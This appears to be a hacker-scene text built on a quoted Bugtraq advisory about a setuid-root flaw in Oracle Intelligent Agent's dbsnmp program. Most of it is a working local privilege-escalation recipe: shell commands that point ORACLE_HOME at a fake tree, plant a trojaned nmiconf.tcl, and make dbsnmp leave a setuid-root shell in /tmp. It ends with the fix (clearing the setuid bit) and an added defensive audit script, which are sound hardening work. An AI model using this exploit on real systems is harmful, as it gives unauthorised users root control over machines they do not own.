START OF BUGTRAQ POST
Oracle installations with the 'Oracle Intelligent Agent' installed have a
path related vulnerability. The problem lies in the dbsnmp program located
in $ORACLE_HOME/bin. This setuid root program calls a tcl script
(nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The
problem is that the dbsnmp script relies on an environment variable (the
path to nmiconf.tcl) which can be set by a user. Therefore, intruders
can force the script to execute a trojaned version of nmiconf.tcl which
will run as root.
END OF BUGTRAQ POST
Apparently, as we see from above, $ORACLE_HOME would need to be reset for
this exploit to work properly. So let's do it.
First of all, drop to a Bourne or Korn shell and do the following:
-------
# helper script that the trojaned nmiconf.tcl runs (as root, via dbsnmp)
echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345
chmod +x /tmp/.12345
# fake ORACLE_HOME containing the directory dbsnmp looks in for nmiconf.tcl
mkdir -p /tmp/whatever/network/agent/config
export ORACLE_HOME=/tmp/whatever
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ system "/tmp/.12345" ]
EOF
# or even an exec call instead of system... whatever...
# (system is a TclX extension command; stock tclsh only has exec)
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/.12345 ]
EOF
-------
Mileage may vary widely with your OS and tcl version,
so this is merely a template of the process involved.
However, all one needs to do to make this a reality
is run the old (setuid) dbsnmp program, and it will leave a
setuid-root shell in /tmp called /tmp/.sh.
Execute that shell and enjoy elevated privileges.
NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable.
There's no reason to have it set in the first place, as root should
be the only user really allowed to run the SNMP agent anyway.
duh
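As an added example (not code from the original post), the following POSIX shell script audits an ORACLE_HOME tree for the two conditions the post describes, a setuid dbsnmp in bin/ and a writable nmiconf.tcl in network/agent/config/, and applies the recommended fix by clearing the set-user-ID bit. The directory layout and the fake dbsnmp/nmiconf.tcl it builds are constructed so it runs offline against a throw-away tree.

```shell
#!/bin/sh
# Added example, not from the original post: audit an ORACLE_HOME for a
# setuid dbsnmp and a writable agent config, then strip the setuid bit as
# the post recommends.  Uses only POSIX sh, find(1) and chmod(1).

# Print every regular file under $1/bin that carries the set-user-ID bit.
list_setuid_bins() {
    find "$1/bin" -type f -perm -4000 2>/dev/null
}

# Print agent config files under $1 that other users can write; a
# trojaned nmiconf.tcl would be planted here if the directory is loose.
list_writable_agent_config() {
    find "$1/network/agent/config" -type f -perm -002 2>/dev/null
}

# Clear the set-user-ID bit on everything list_setuid_bins reports, print
# each path changed, and succeed only when nothing setuid remains.
strip_setuid_bins() {
    list_setuid_bins "$1" | while IFS= read -r f; do
        chmod u-s "$f" && printf '%s\n' "$f"
    done
    [ -z "$(list_setuid_bins "$1")" ]
}

# Constructed throw-away ORACLE_HOME so the functions run offline: a fake
# mode-4755 dbsnmp, a normal binary, and a world-writable nmiconf.tcl.
make_fake_oracle_home() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bin" "$d/network/agent/config"
    : > "$d/bin/dbsnmp";  chmod 4755 "$d/bin/dbsnmp"
    : > "$d/bin/sqlplus"; chmod 0755 "$d/bin/sqlplus"
    : > "$d/network/agent/config/nmiconf.tcl"
    chmod 0666 "$d/network/agent/config/nmiconf.tcl"
    printf '%s\n' "$d"
}

# Stand-alone demonstration against the constructed tree.
demo_home=$(make_fake_oracle_home)
echo "setuid binaries:";       list_setuid_bins "$demo_home"
echo "writable agent config:"; list_writable_agent_config "$demo_home"
echo "stripping setuid bit:";  strip_setuid_bins "$demo_home"
rm -rf "$demo_home"
```

Run it against a real install with `list_setuid_bins "$ORACLE_HOME"` first; anything it prints besides what you deliberately keep setuid is a candidate for `chmod u-s`.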
" ...it takes a good man to beat me... it just doesnt take very long."
.|.. ..|.
mujahadin
no extra charge for typos